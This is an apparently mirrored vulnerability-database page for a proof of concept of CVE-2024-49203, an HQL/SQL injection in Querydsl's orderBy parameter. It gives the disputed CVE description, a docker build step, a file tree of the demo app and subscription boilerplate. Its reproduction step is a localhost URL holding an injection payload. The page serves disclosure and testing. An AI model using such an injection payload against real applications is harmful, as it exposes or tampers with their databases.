CVE-2024-49203 PoC — Querydsl 安全漏洞

Source

https://github.com/CSIRTTrizna/CVE-2024-49203

Associated Vulnerability

Title:Querydsl 安全漏洞 (CVE-2024-49203)
Description:Querydsl 5.1.0 and OpenFeign Querydsl 6.8 allows SQL/HQL injection in orderBy in JPAQuery. NOTE: this is disputed by a Querydsl community member because the product is not intended to defend against a developer who uses untrusted input directly in query construction.

Readme

Build
-----

```docker compose up -d```


Reproduce
---------
In browser go to 

```http://localhost:8000/products?orderBy=name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'2')='2'+ORDER+BY+t.id```

File Snapshot


 [4.0K]  /data/pocs/cf15583991bae21812ca3d6a6f0dda8d26de5d8f
├── [4.0K]  demo
│   ├── [ 429]  Dockerfile
│   ├── [ 10K]  mvnw
│   ├── [6.8K]  mvnw.cmd
│   ├── [2.2K]  pom.xml
│   └── [4.0K]  src
│       ├── [4.0K]  main
│       │   ├── [4.0K]  java
│       │   │   └── [4.0K]  com
│       │   │       └── [4.0K]  example
│       │   │           └── [4.0K]  demo
│       │   │               ├── [ 305]  DemoApplication.java
│       │   │               ├── [1.0K]  QTest.java
│       │   │               ├── [1.1K]  TestController.java
│       │   │               └── [ 651]  Test.java
│       │   └── [4.0K]  resources
│       │       └── [ 275]  application.properties
│       └── [4.0K]  test
│           └── [4.0K]  java
│               └── [4.0K]  com
│                   └── [4.0K]  example
│                       └── [4.0K]  demo
│                           └── [ 206]  DemoApplicationTests.java
├── [ 672]  docker-compose.yml
├── [4.0K]  postgres
│   └── [ 111]  init.sql
└── [ 199]  README.md

14 directories, 13 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!